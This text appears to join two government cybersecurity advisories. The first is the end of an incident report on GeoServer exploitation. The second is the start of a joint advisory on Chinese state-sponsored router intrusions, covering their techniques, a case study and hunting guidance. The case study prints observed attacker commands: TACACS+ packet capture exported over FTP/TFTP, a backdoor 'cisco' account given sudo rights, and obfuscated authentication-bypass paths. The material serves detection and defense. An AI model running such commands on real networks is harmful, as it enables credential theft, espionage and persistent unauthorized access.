Acquire Infrastructure: Virtual Private Server T1583.003 The cyber threat actors gained remote access to the victim’s network using a desktop behind a virtual private server (VPS).

Table 4. Initial Access

Technique Title ID Use
Exploit Public-Facing Application T1190 The cyber threat actors exploited CVE 2024-36401 on two of the organization’s public-facing GeoServers.

Table 5. Execution

Technique Title ID Use
Command and Scripting Interpreter: PowerShell T1059.001 The cyber threat actors used PowerShell to download a payload.

Table 6. Defense Evasion

Technique Title ID Use
Indirect Command Execution T1202 The cyber threat actors employed indirect command execution via web shells.

Table 7. Persistence

Technique Title ID Use
BITS Jobs T1197 The cyber threat actors abused BITS jobs.
Scheduled Task/Job: Cron T1053.003 The cyber threat actors established persistence through cron jobs.
Server Software Component: Web Shell T1505.003 The cyber threat actors uploaded web shells for persistence.
Valid Accounts T1078 The cyber threat actors used valid accounts for persistence.

Table 8. Privilege Escalation

Technique Title ID Use
Exploitation for Privilege Escalation T1068 The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.

Table 9. Credential Access 

Technique Title ID Use
Brute Force T1110 The cyber threat actors used brute force techniques to obtain login credentials for web services.

Table 10. Discovery

Technique Title ID Use
Account Discovery: Local Account T1087.001 The cyber threat actors used cat /etc/passwd to discover local users.
File and Directory Discovery T1083 The cyber threat actors used dir c:\, dir d:\, dir e:\, and type c:\ commands to identify files and directories on the SQL server. 
Network Service Discovery T1046 The cyber threat actors used fscan to identify SSH listeners and FTP servers.
Process Discovery T1057 The cyber threat actors used tasklist on the SQL server.
Remote System Discovery T1018 The cyber threat actors performed ping sweeps of hosts within specific subnets.
System Information Discovery T1082 The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.
System Network Configuration Discovery T1016 The cyber threat actors used ipconfig to check GeoServer 1’s and the SQL server’s network configurations.
System Network Connections Discovery T1049 The cyber threat actors executed commands such as netstat to obtain a listing of network connections to or from the systems they compromised.
System Owner/User Discovery T1033 The cyber threat actors used whoami on the SQL server.

Table 11. Command and Control

Technique Title  ID Use
Ingress Tool Transfer T1105 The cyber threat actors used PowerShell and bitsadmin getfile to download payloads.
Proxy T1090 The cyber threat actors used a connection proxy to direct traffic from their C2 server.

Mitigations

CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.
    • Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.
      • CISA urges organizations to address KEV catalog vulnerabilities immediately.
    • Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.
    • Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.
      • Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., attack surface management tools, vulnerability scanners).
      • Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.
    • Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.
  • Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A].
    • Prepare a written IRP policy and IRP with senior leadership support.
      • The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.
      • The IRP should identify:
        • Key personnel with knowledge of the network
        • Key resources and courses of action (COAs) for containment and eradication in the event of compromise.
        • Procedures for granting third parties prompt access to networks and security tools.
          • This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).
      • The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).
      • Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.
        • During the test, include engagement with third party incident responders and external EDR agents and other tools.
        • Following the test, update the IRP as necessary.
        • See CISA’s Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises.
      • For more information on IRPs, see the National Institute of Science and Technology’s (NIST’s) SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile.
  • Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location.
    • Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.
    • Consider using a SIEM solution for log aggregation and management.
    • Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).
      • Abnormal activity to look for includes:
        • Running scans to discover other network connected devices.
        • Running commands to list, add, or alter administrator accounts.
        • Using PowerShell to download and execute remote programs.
        • Running scripts not usually seen on a network.
      • For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.

In addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity:

  • Require phishing-resistant MFA for access to all privileged accounts and email services accounts [CPG 2.H].
  • Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access.

Validate Security Controls

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3 through Table 11).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

Version History

September 23, 2025: Initial version.

Apendix: Key Events Timeline

Date/Time Relevant Host Event
July 1, 2024 n/a CVE-2024-36401 published.
July 11, 2024 GeoServer 1 Initial Access to GeoServer 1.
July 15, 2024 n/a CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.
July 15, 2024 GeoServer 1 EDR detects Stowaway tool on GeoServer 1.
July 24, 2024 GeoServer 2 Initial Access to GeoServer 2.
July 31, 2024 Web Server Initial Access to Web Server.
July 31, 2024 SQL Server Initial Access to SQL Server.
Aug. 1, 2024 SQL Server, GeoServer 1 Organization observes SQL Alert and contains SQL Server and GeoServer 1.
Aug. 1, 2024 n/a The impacted organization requested assistance from CISA.
Aug. 5, 2024 n/a CISA began forensic artifact analysis.
Aug. 6, 2024 GeoServer 2 Last observed threat actors’ activity—discovery commands on GeoServer 2.
Aug. 8 – Sept. 3, 2024 n/a CISA conducted their full incident response.

Notes

[1] “GeoServer/GeoServer,” GitHub, published July 1, 2024, https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w.

[2] “firefart/dirtycow,” GitHub, last modified 2021, https://github.com/firefart/dirtycow.

[3] “T4y1oR/RingQ” GitHub, last modified February 19, 2025. https://github.com/T4y1oR/RingQ.

[4] “shadow1ng/fscan,” GitHub, last modified July 2025, https://github.com/shadow1ng/fscan.

[5] “ph4ntonn/Stowaway,” GitHub, last modified April 2025, https://github.com/ph4ntonn/Stowaway.


  •  

Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System

Executive summary

People’s Republic of China (PRC) state-sponsored cyber threat actors are targeting networks globally, including, but not limited to, telecommunications, government, transportation, lodging, and military infrastructure networks. While these actors focus on large backbone routers of major telecommunications providers, as well as provider edge (PE) and customer edge (CE) routers, they also leverage compromised devices and trusted connections to pivot into other networks. These actors often modify routers to maintain persistent, long-term access to networks. 

This activity partially overlaps with cyber threat actor reporting by the cybersecurity industry—commonly referred to as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor, among others. The authoring agencies are not adopting a particular commercial naming convention and hereafter refer to those responsible for the cyber threat activity more generically as “Advanced Persistent Threat (APT) actors” throughout this advisory. This cluster of cyber threat activity has been observed in the United States, Australia, Canada, New Zealand, the United Kingdom, and other areas globally.

This Cybersecurity Advisory (CSA) includes observations from various government and industry investigations where the APT actors targeted internal enterprise environments, as well as systems and networks that deliver services directly to customers. This CSA details the tactics, techniques, and procedures (TTPs) leveraged by these APT actors to facilitate detection and threat hunting, and provides mitigation guidance to reduce the risk from these APT actors and their TTPs.

This CSA is being released by the following authoring and co-sealing agencies:

  • United States National Security Agency (NSA)
  • United States Cybersecurity and Infrastructure Security Agency (CISA)
  • United States Federal Bureau of Investigation (FBI)
  • United States Department of Defense Cyber Crime Center (DC3)
  • Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)
  • Canadian Centre for Cyber Security (Cyber Centre)
  • Canadian Security Intelligence Service (CSIS)
  • New Zealand National Cyber Security Centre (NCSC-NZ)
  • United Kingdom National Cyber Security Centre (NCSC-UK)
  • Czech Republic National Cyber and Information Security Agency (NÚKIB) - Národní úřad pro kybernetickou a informační bezpečnost
  • Finnish Security and Intelligence Service (SUPO) - Suojelupoliisi
  • Germany Federal Intelligence Service (BND) - Bundesnachrichtendienst
  • Germany Federal Office for the Protection of the Constitution (BfV) -   Bundesamt für Verfassungsschutz
  • Germany Federal Office for Information Security (BSI) - Bundesamt für Sicherheit in der Informationstechnik
  • Italian External Intelligence and Security Agency (AISE) - Agenzia Informazioni e Sicurezza Esterna
  • Italian Internal Intelligence and Security Agency (AISI) - Agenzia Informazioni e Sicurezza Interna
  • Japan National Cybersecurity Office (NCO) - 国家サイバー統括室
  • Japan National Police Agency (NPA) - 警察庁
  • Netherlands Defence Intelligence and Security Service (MIVD) - Militaire Inlichtingen- en Veiligheidsdienst
  • Netherlands General Intelligence and Security Service (AIVD) - Algemene Inlichtingen- en Veiligheidsdienst
  • Polish Military Counterintelligence Service (SKW) - Służba Kontrwywiadu Wojskowego
  • Polish Foreign Intelligence Agency (AW) - Agencja Wywiadu
  • Spain National Intelligence Centre (CNI) - Centro Nacional de Inteligencia

The authoring agencies strongly urge network defenders to hunt for malicious activity and to apply the mitigations in this CSA to reduce the threat of Chinese state-sponsored and other malicious cyber activity.

Any mitigation or eviction measures listed within are subject to change as new information becomes available and ongoing coordinated operations dictate. Network defenders should ensure any actions taken in response to the CSA are compliant with local laws and regulations within the jurisdictions within which they operate. 

Background

The APT actors have been performing malicious operations globally since at least 2021. These operations have been linked to multiple China-based entities, including at least Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司). These companies provide cyber-related products and services to China’s intelligence services, including multiple units in the People’s Liberation Army and Ministry of State Security. The data stolen through this activity against foreign telecommunications and Internet service providers (ISPs), as well as intrusions in the lodging and transportation sectors, ultimately can provide Chinese intelligence services with the capability to identify and track their targets’ communications and movements around the world.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s People's Republic of China Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report:

For a downloadable list of IOCs, visit:

Cybersecurity Industry Tracking 

The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to this Chinese state-sponsored cyber activity. While not all encompassing, the following are the most notable threat group names related to this activity and commonly used within the cybersecurity community:

  • Salt Typhoon,
  • OPERATOR PANDA,
  • RedMike,
  • UNC5807, and
  • GhostEmperor. 

Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring agencies’ understanding for all activity related to these groupings.

Technical details

The following sections are a compilation of TTPs the APT actors have used since at least 2021 to target enterprise environments. Particularly notable TTPs include modifying router configurations for lateral movement pivoting between networks and using virtualized containers on network devices to evade detection. The actors continue to use many of the TTPs listed, but expect them to evolve when existing TTPs no longer achieve their goals. Even if no longer used regularly, the actors may still use previous TTPs opportunistically in favorable conditions. The TTP descriptions can also be useful to network defenders for retroactive threat hunting.

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17 and MITRE ATT&CK for ICS framework, version 17. See the Appendix A: MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the APT actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Initial access

Investigations associated with these APT actors indicate that they are having considerable success exploiting publicly known common vulnerabilities and exposures (CVEs) and other avoidable weaknesses within compromised infrastructure [T1190]. Exploitation of zero-day vulnerabilities has not been observed to date. The APT actors will likely continue to adapt their tactics as new vulnerabilities are discovered and as targets implement mitigations, and will likely expand their use of existing vulnerabilities. The following list is not exhaustive and the authoring agencies suspect that the APT actors may target other devices (e.g., Fortinet firewalls, Juniper firewalls, Microsoft Exchange, Nokia routers and switches, Sierra Wireless devices, Sonicwall firewalls, etc.). 

If not yet patched, defenders should prioritize the following CVEs due to their historical exploitation on exposed network edge devices by these APT actors. Example exploited CVEs, ordered by year, include:

  • CVE-2024-21887 - Ivanti Connect Secure and Ivanti Policy Secure web-component command injection vulnerability, commonly chained after CVE-2023-46805 (authentication bypass)
  • CVE-2024-3400 - Palo Alto Networks PAN-OS GlobalProtect arbitrary file creation leading to OS command injection. The CVE allows for unauthenticated remote code execution (RCE) on firewalls when GlobalProtect is enabled on specific versions/configurations.
  • CVE-2023-20273 - Cisco Internetworking Operating System (IOS) XE software web management user interface post-authentication command injection/privilege escalation (commonly chained with CVE-2023-20198 for initial access to achieve code execution as root) [T1068]
  • CVE-2023-20198 - Cisco IOS XE web user interface authentication bypass vulnerability
    • While exploiting CVE-2023-20198, the APT actors used the Web Services Management Agent (WSMA) endpoints /webui_wsma_Http or /webui_wsma_Https to bypass authentication and create unauthorized administrative accounts. In some cases, the APT actors obfuscated requests by “double encoding” portions of the path, e.g., /%2577eb%2575i_%2577sma_Http or /%2577eb%2575i_%2577sma_Https [T1027.010]. Observed requests varied in case, so hunting and detection should be case-insensitive and tolerant of over-encoding.
    • After patching this CVE, WSMA endpoints requests are internally proxied, and the system adds a Proxy-Uri-Source HTTP header as part of the remediation logic. The presence of Proxy-Uri-Source header in traffic to /webui_wsma_* indicates a patched device handling the request, not exploitation. This can help distinguish between vulnerable and remediated systems when analyzing logs or captures.
  • CVE-2018-0171 - Cisco IOS and IOS XE smart install remote code execution vulnerability

The APT actors leverage infrastructure, such as virtual private servers (VPSs) [T1583.003] and compromised intermediate routers [T1584.008], that have not been attributable to a publicly known botnet or obfuscation network infrastructure to target telecommunications and network service providers, including ISPs [T1090]. 

The APT actors may target edge devices regardless of who owns a particular device. Devices owned by entities who do not align with the actors’ core targets of interest still present opportunities for use in attack pathways into targets of interest. The actors leverage compromised devices and trusted connections or private interconnections (e.g., provider-to-provider or provider-to-customer links) to pivot into other networks [T1199]. In some instances, the actors modify routing and enable traffic mirroring (switch port analyzer (SPAN)/remote SPAN (RSPAN)/encapsulated remote SPAN (ERSPAN) where available) on compromised network devices and configure Generic Routing Encapsulation (GRE)/IPsec tunnels and static routes to achieve the same goal [T1095]. Additionally, these APT actors often simultaneously exploit large numbers of vulnerable, Internet-exposed devices across many IP addresses and may revisit individual systems for follow-on operations.

Initial access vectors remain a critical information gap for parties working to understand the scope, scale, and impact of the actors’ malicious activity. The authoring agencies encourage organizations to provide compromise details to appropriate authorities (see Contact information) to continue improving all parties’ understanding and responses.

Persistence

To maintain persistent access to target networks, the APT actors use a variety of techniques. Notably, a number of these techniques can obfuscate the actors’ source IP address in system logs, as their actions may be recorded as originating from local IP addresses [T1027]. Specific APT actions include:

  • Modifying Access Control Lists (ACLs) to add IP addresses. This alteration allows the actors to bypass security policies and maintain ongoing access by explicitly permitting traffic from a threat actor-controlled IP address [T1562.004].
    • The APT actors often named their ACLs “access-list 20”. When 20 was already used, the actors commonly used 50 or 10.
  • Opening standard and non-standard ports, which can open and expose a variety of different services (e.g., Secure Shell [SSH], Secure File Transfer Protocol [SFTP], Remote Desktop Protocol [RDP], File Transfer Protocol [FTP], HTTP, HTTPS) [T1071]. This strategy supplies multiple avenues for remote access and data exfiltration. Additionally, utilizing non-standard ports can help the APT actors evade detection by security monitoring tools that focus on standard port activity [T1571].
    • The APT actors have been enabling SSH servers and opening external-facing ports on network devices to maintain encrypted remote access [T1021.004]. In some cases, the SSH services were established on high, non-default Transmission Control Protocol (TCP) ports using the port numbering scheme of 22x22 or xxx22, though port patterns may vary across intrusions. The actors may add keys to existing SSH services to regain entry into network devices [T1098.004].
    • The APT actors enable or abuse built-in HTTP/HTTPS management servers and sometimes reconfigure them to non-default high ports. Note: HTTP servers have been observed using the port numbering scheme of 18xxx.
      • Enabling HTTP/HTTPS servers on Cisco devices affected by CVE-2023-20198. If the web UI feature is enabled on Cisco IOS XE Software, this vulnerability provides an entry opportunity for the APT actors.
  • Following compromise of a router, the following commands and activities have been observed on compromised devices [T1059.008]:
    • Executing commands via SNMP [T1569].
    • SSH activity from remote or local IP addresses.
    • Web interface panel (POST) requests.
    • When present, using service or automation credentials (e.g., those used by configuration-archival systems such as RANCID) to enumerate and access other networking devices.
    • Executing Tcl scripts (e.g., TCLproxy.tcl and map.tcl) on Cisco IOS devices where tclsh was available.
  • Depending on the configuration of the Simple Network Management Protocol (SNMP) on the compromised network device, the APT actors enumerate and alter the configurations for other devices in the same community group, when possible [T1021]. Note: Properly configured SNMPv3 is considerably more secure than previous versions.
    • Utilizing SNMPwalk (SNMP GET/WALK) to enumerate devices from APT actor-controlled hosts. Where configuration changes were observed, they were issued as SNMP SET requests to writable objects from those hosts [T1016].
  • Creating tunnels over protocols, such as Generic Routing Encapsulation (GRE), multipoint GRE (mGRE), or IPsec, on network devices, presumably based on what would be expected in the environment [T1572].
    • These tunnels allow for the encapsulation of multiple network layer protocols over a single tunnel, which can create persistent and covert channels for data transmission to blend in with normal network traffic.
    • Some of these actions may obscure the APT actors’ source IP address in logs due to being logged as a local IP.
  • Running commands in an on-box Linux container on supported Cisco networking devices to stage tools, process data locally, and move laterally within the environment. This often allows the APT actors to conduct malicious activities undetected because activities and data within the container are not monitored closely. [T1610] [T1588.002] [T1588.005] [T1059.006].
    • Within Guest Shell, running Python (such as siet.py to exploit Cisco Smart Install) and native Linux tooling, installing packages (e.g., via pip/yum where available), parsing and staging locally collected artifacts (e.g., configurations, packet captures) on device storage [T1560]. On NX-OS devices specifically, using dohost to script host-level CLI actions for reconnaissance and persistence. For Cisco IOS XE, Guest Shell is a Linux container (LXC) managed by IOx that is enabled with guestshell enable and accessed with guestshell run bash. By default, processes inside Guest Shell egress via the management virtual routing and forwarding (VRF) instance. On platforms without a dedicated management port, connectivity can be provided with a VirtualPortGroup interface. Guest Shell can execute Python and other 64-bit Linux applications and can read/write device-accessible storage (e.g., flash) as configured. [T1609] [T1543.005]
    • For Cisco NX-OS, Guest Shell is an LXC environment entered with run guestshell. It has direct access to bootflash: and can invoke host NX-OS CLI via the dohost utility. Networking uses the device’s default VRF by default. Operators (or malware) can run commands in other VRFs using chvrf. Systemd-managed services are typically long-running components inside Guest Shell.
    • Using guestshell disable and guestshell destroy commands to deactivate and uninstall Guest Shell container and return all resources to the system [T1070.009].
  • Leveraging open source multi-hop pivoting tools, such as STOWAWAY, to build chained relays for command and control (C2) and operator access, including interactive remote shells, file upload and download, SOCKS5/HTTP proxying, and local/remote port mapping with support for forward and reverse connections over encrypted node-to-node links [T1090.003].

Lateral movement & collection

Following initial access, the APT actors target protocols and infrastructure involved in authentication—such as Terminal Access Controller Access Control System Plus (TACACS+)—to facilitate lateral movement across network devices, often through SNMP enumeration and SSH. From these devices, the APT actors passively collect packet capture (PCAP) from specific ISP customer networks [T1040] [T1005]. To further support discovery and lateral movement, the APT actors may target: 

  • Authentication Protocols including TACACS+ and Remote Authentication Dial-In User Service (RADIUS)
  • Managed Information Base (MIB) [T1602.001]
  • Router interfaces
  • Resource Reservation Protocol (RSVP) sessions
  • Border Gateway Protocol (BGP) routes
  • Installed software
  • Configuration files [T1590.004] [T1602.002]
    • This is achieved either from existing sources in the network (e.g., output of provider scripts) or through active survey of devices and Trivial File Transfer Protocol (TFTP), to include Multiprotocol Label Switching (MPLS) configuration information.
  • In-transit network traffic using native capabilities to capture or mirror traffic via the SPAN, RSPAN, or ERSPAN capabilities available on many router models.
  • Provider-held data, such as:
    • Subscriber information
    • User content
    • Customer records and metadata
    • Network diagrams, inventories, device configurations, and vendor lists
    • Passwords

Capturing network traffic containing credentials via compromised routers is a common method for further enabling lateral movement [T1040]. This typically takes the form of:

  • Leveraging native PCAP functionalities (e.g., Cisco’s Embedded Packet Capture) on routers to collect RADIUS or TACACS+ authentication traffic, which may contain credentials transmitted in cleartext or weakly protected forms.
    • PCAPs have been observed containing naming schemes such as mycap.pcaptac.pcap1.pcap, or similar variations.
  • Modifying a router’s TACACS+ server configuration to point to an APT actor-controlled IP address [T1556]. These actors may use this capability to capture authentication attempts from network administrators or other devices. They may also adjust Authentication, Authorization, and Accounting (AAA) configurations, forcing devices to use less secure authentication methods or send accounting information to their infrastructure.

The APT actors collect traffic at Layer 2 or 3 (depending on the protocol used), largely from Cisco IOS devices; however, targeting of other device types is also likely. Based on analysis, the APT actors hold interest in making configuration and routing changes to the devices after compromising the routers. While some actions are specific to Cisco devices, the actors are capable of targeting devices from other vendors and could utilize similar functionality. The APT actors perform several of the modifications or techniques below to facilitate follow-on actions.

  • Creating accounts/users and assigning privileges to those accounts, often via modifying router configurations [T1136.001].
    • Brute forcing and re-using credentials to access Cisco devices. If a router configuration is collected during initial exploitation and contains a weak hashed Cisco Type 5 (MD5) or 7 (legacy, weak reversible encoding) password [T1003] [T1110.002]. Weak credentials, such as “cisco” as the username and password, are routinely exploited through these techniques.
  • Scanning for open ports and services and mirroring (SPAN/RSPAN sessions), allowing traffic monitoring from multiple interfaces [T1595].
  • Running commands on the router via SNMP, SSH, and HTTP GET or POST requests. These requests typically target privileged execution paths, such as /level/15/exec/-/*, and may include instructions to display configuration files, access BGP routes, manage VRF instances, or clear system logs [T1082].
    • Many compromised devices use well known SNMP community strings, including “public” and “private”.
  • Configuring PCAP capabilities to collect network traffic.
  • Configuring tunnels.
  • Using monitoring tools present in the environment to monitor a device’s (commonly a router’s) configuration changes.
  • Updating routing tables to route traffic to actor-controlled infrastructure.
  • Using several techniques to avoid detection of their activity, including:
    • Deleting and/or clearing logs, possibly in tandem with reverting or otherwise modifying stored configuration files to avoid leaving traces of the modifications [T1070].
    • Disabling logging and/or disabling sending logs to central servers.
    • Stopping/starting event logging on network devices.
    • Configuring a Cisco device to run a Guest Shell container to evade detection from collecting artifacts, data, or PCAP [T1610].

Exfiltration

A key concern with exfiltration is the APT actors’ abuse of peering connections (i.e., a direct interconnection between networks that allows traffic exchange without going through an intermediary) [T1599]. Exfiltration may be facilitated due to a lack of policy restraints or system configurations limiting the types of data received by peered ISPs.

Analysis indicates that the APT actors leverage separate (potentially multiple) command and control channels for exfiltration to conceal their data theft within the noise of high-traffic nodes, such as proxies and Network Address Translation (NAT) pools. The APT actors often use tunnels, such IPsec and GRE, to conduct C2 and exfiltration activities [T1048.003].

Case study

This section details techniques employed by the APT actors, as well as indicators received from analysis to detect this activity. The APT actors were stopped before further actions could be taken on the compromised network.

Collecting native PCAP

The APT actors collected PCAPs using native tooling on the compromised system, with the primary objective likely being to capture TACACS+ traffic over TCP port 49. TACACS+ packet bodies can be decrypted if the encryption key is known. In at least one case, the device configuration stored the TACACS+ shared secret using Cisco Type 7 reversible obfuscated encoding. Recovering that secret from the configuration would enable offline decryption of captured TACACS+ payloads. TACACS+ traffic is used for authentication, often for administration of network equipment and including highly privileged network administrators accounts and credentials, likely enabling the actors to compromise additional accounts and perform lateral movement. 
The commands listed in Table 1 were observed on a Cisco IOS XE-based host to aid PCAP exfiltration.

Table 1: Commands to collect PCAP
Command     Description
monitor capture mycap interface <interface-name> both Set up a packet capture named 'mycap'
monitor capture mycap match ipv4 protocol tcp any any eq 49  Target port 49 on the above interface - TACACS+
monitor capture mycap buffer size 100
monitor capture mycap start Start the capture
show monitor capture mycap buffer brief Check status of capture
monitor capture mycap export bootflash:tac.pcap Export PCAP to file, staging for exfiltration
copy bootflash:tac.pcap ftp://<domain/service>:*@<IP> Exfiltration
copy bootflash:tac.pcap tftp://<IP>/tac.pcap


Host-level indicators

If console logging or visibility of remote FTP/TFTP from a network appliance are available, the following host-level indicators may assist with detecting activity: 

Capture name: 'mycap' 
Capture rule: 'match ipv4 protocol tcp any any eq 49' 
Exported pcap filename: 'tac.pcap'

tftp remote filename: 'tac.pcap' 
tftp remote IP: [remote IP] 

Enabling SSH access to the underlying Linux host on IOS XR

Cisco IOS XR (64-bit) is a Linux-based network operating system built on a Yocto-based Wind River Linux distribution. IOS XR is typically administered via the IOS XR CLI over SSH on port TCP/22 or via console. 

The built-in sshd_operns service exposes an additional SSH endpoint on the host Linux. When enabled, it listens on TCP/57722 and provides direct shell access to the host OS. Root logins are not permitted to this service, as only non-root accounts can authenticate.

On IOS XR, sshd_operns is disabled by default and must be explicitly started (e.g., service sshd_operns start). Persistence across reboots requires enabling at init (chkconfig) or equivalent.

In observed intrusions, the APT actors enabled sshd_operns, created a local user, and granted it sudo privileges (e.g., by editing /etc/sudoers or adding a file under /etc/sudoers.d/) to obtain root on the host OS after logging in via TCP/57722. 

The commands listed in Table 2 were executed from the host Linux bash shell as root.

Table 2: Commands to add user to sudoers
Command     Description
service sshd_operns start Starting the sshd_operns service

useradd cisco

password cisco

Adding a new user
sudo vi /etc/sudoers Adding the new user to sudoers
chmod 4755 /usr/bin/sudo As 4755 is the default permissions for sudo, it is unclear why the actors executed this command

Threat hunting guidance

The authoring agencies encourage network defenders of critical infrastructure organizations, especially telecommunications organizations, to perform threat hunting, and, when appropriate, incident response activities. If malicious activity is suspected or confirmed, organizations should consider all mandatory reporting requirements to relevant agencies and regulators under applicable laws and regulations, and any additional voluntary reporting to appropriate agencies, such as cybersecurity or law enforcement agencies who can provide incident response guidance and assistance with mitigation. See the Contact information section for additional reporting information.

The malicious activity described in this advisory often involves persistent, long-term access to networks where the APT actors maintain several methods of access. Network defenders should exercise caution when sequencing defensive measures to maximize the chance of achieving full eviction, while remaining compliant with applicable laws, regulations, and guidance on incident response and data breach notifications in their jurisdictions. Where possible, gaining a full understanding of the APT actors’ extent of access into networks followed by simultaneous measures to remove them may be necessary to achieve a complete and lasting eviction. Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction. Incident response on one network may also result in the APT actors taking measures to conceal and maintain their access on additional compromised networks, and potentially disrupt broader investigative and operational frameworks already in progress.

The APT actors often take steps to protect their established access, such as compromising mail servers or administrator devices/accounts to monitor for signs that their activity has been detected. Organizations should take steps to protect the details of their threat hunting and incident response from APT actor monitoring activities.

The authoring agencies strongly encourage organizations to conduct the following actions for threat hunting:

Monitor configurations changes

  • Pull all configurations for running networking equipment and check for differences with latest authorized versions.
    • Review remote access configurations for proper application of ACL and transport protocols. Review ACLs for any unauthorized modifications.
    • If SNMP is being used, ensure networking equipment is configured to use SNMPv3 with the appropriate authentication and privacy configurations set, as defined in the User-based Security Model (USM) and the View-based Access Control Model (VACM).
    • Verify the authenticity of any configured local accounts and their permission levels.
  • Check all routing tables to ensure that all routes are authorized and expected.
  • Verify that any PCAP commands configured on networking equipment are authorized.

Monitor virtualized containers

  • If networking equipment has the capability to run virtualized containers, ensure that all running virtualized containers are expected and authorized.
  • For devices that support Cisco Guest Shell (IOS XE and NX-OS), do not rely on device syslog alone to detect actor activity. Use a combination of device syslog, AAA command accounting, container (Guest Shell) logs, and off-box flow/telemetry.
  • Capture lifecycle and CLI activity with AAA accounting (TACACS+/RADIUS) for configuration/exec commands so that enable/disable and entry actions are recorded.
  • For IOS XE, hunt for guestshell enable, guestshell run bash, and guestshell disable. On NX-OS, hunt for guestshell enable, run guestshell, and guestshell destroy. Alert on unexpected use of chvrf (running commands under a different VRF) and, on NX-OS, use of dohost (container invoking host CLI).

Monitor network services and tunnels

  • Monitor for management services running on non-standard ports (SSH, FTP, etc.).
  • Hunt for actor-favored protocol patterns:
    • SSH on high non-default ports with 22x22/xxx22 numbering patterns from non-admin source IPs.
    • HTTPS/Web UI listeners on non-default high ports (18xxx) reachable from outside the management VRF.
    • TCP/57722 (IOS XR sshd_operns) reachability or flows.
      • Hunt for TCP/57722 listeners on IOS XR platforms (the host Linux sshd_operns service). Collect flow/telemetry (NetFlow/IPFIX) from the management VRF. Any inbound TCP/57722 should be treated as high-risk if unexpected.
    • TACACS+ (TCP/49) flows to non-approved IPs or any TACACS+ traffic leaving the management VRF. Correlate with device configuration to detect redirection of TACACS+ servers to APT actor-controlled infrastructure.
    • FTP/TFTP flows originating from network devices to unapproved destinations, especially when preceded by on-box PCAP collection activity.
  • Audit any tunnel that transits a security boundary, such as peering points between providers, to ensure it can be accounted for by network administrators. In particular, examine:
    • Unexplained or unexpected tunnels between Autonomous System Numbers (ASNs).
    • Unauthorized use of file transfer protocols, such as FTP and TFTP.
      • Monitor network traffic for abnormal volumes of files transfers to internal FTP servers, which the APT actors may use as staging areas prior to data exfiltration.
    • Extensive SSH activity against routers, followed by the establishment of both an incoming tunnel and outgoing tunnel—each of which may leverage different protocols.

Monitor firmware and software integrity

